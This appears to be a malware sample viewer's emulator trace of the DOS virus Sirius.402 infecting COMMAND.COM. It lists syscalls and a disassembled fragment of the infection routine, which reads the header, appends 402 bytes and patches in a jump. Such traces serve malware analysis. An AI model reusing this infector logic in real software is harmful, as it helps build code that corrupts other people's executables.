Sample viewer

vx.netlux.org/Virus.DOS.Sirius.402

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:23.965799325Z 47 PC: 14117 | Get disk transfer address
2018-12-17T22:54:23.978464213Z 26 PC: 14129 | Set disk transfer address
2018-12-17T22:54:23.979950769Z 25 PC: 14138 | Get default drive
2018-12-17T22:54:23.981476583Z 14 PC: 14142 | Set default drive (Drive = 'C')
2018-12-17T22:54:23.983795441Z 78 PC: 1414f | Find first file
2018-12-17T22:54:23.989797975Z 67 PC: 1417c | Get or set file attributes
2018-12-17T22:54:23.99488659Z 67 PC: 14189 | Get or set file attributes
2018-12-17T22:54:24.345361907Z 61 PC: 14191 | Open file (Filename = 'COMMAND.COM')
2018-12-17T22:54:24.351661422Z 87 PC: 14198 | Get or set file date and time
2018-12-17T22:54:24.353115709Z 44 PC: 141a6 | Get time
0x141a6: or dl, dl
0x141a8: je 0x141a2
0x141aa: mov byte ptr [bp + 0x18c], dl
0x141ae: mov ah, 0x3f
0x141b0: lea dx, word ptr [bp + 0x15a]
0x141b4: mov cx, 3
0x141b7: int 0x21
0x141b9: mov ax, 0x4202
0x141bc: sub cx, cx
0x141be: sub dx, dx
0x141c0: int 0x21
0x141c2: sub ax, 3
0x141c5: mov word ptr cs:[0xfb2d], ax
0x141c9: mov byte ptr cs:[0xfb2c], 0xe9
0x141cf: lea si, word ptr [bp - 3]
0x141d2: nop
0x141d3: mov di, 0xfcbc
0x141d6: mov cx, 0x192
0x141d9: cld
0x141da: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T22:54:24.356061089Z 63 PC: 141b9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:54:24.358699797Z 66 PC: 141c2 | Move file pointer
2018-12-17T22:54:24.360223562Z 64 PC: 141ec | Write file or device (Write 402 bytes on handle 5)
2018-12-17T22:54:24.367860022Z 66 PC: 141f5 | Move file pointer
2018-12-17T22:54:24.3710364Z 64 PC: 141ff | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:54:24.373731758Z 87 PC: 14214 | Get or set file date and time
2018-12-17T22:54:24.375385432Z 62 PC: 14218 | Close file
2018-12-17T22:54:24.382157954Z 67 PC: 14225 | Get or set file attributes
2018-12-17T22:54:24.391087316Z 26 PC: 14234 | Set disk transfer address
2018-12-17T22:54:24.392409273Z 14 PC: 1423e | Set default drive (Drive = 'A')
2018-12-17T22:54:24.394513131Z 9 PC: 12a47 | Display string (String= 'GOAT File Generator 1.00 � (c) 1994-96 by ROSE, Ralph Roth! (16.12.1996) File: ROSE007.COM - 5.800 (16A8h) Bytes length! ')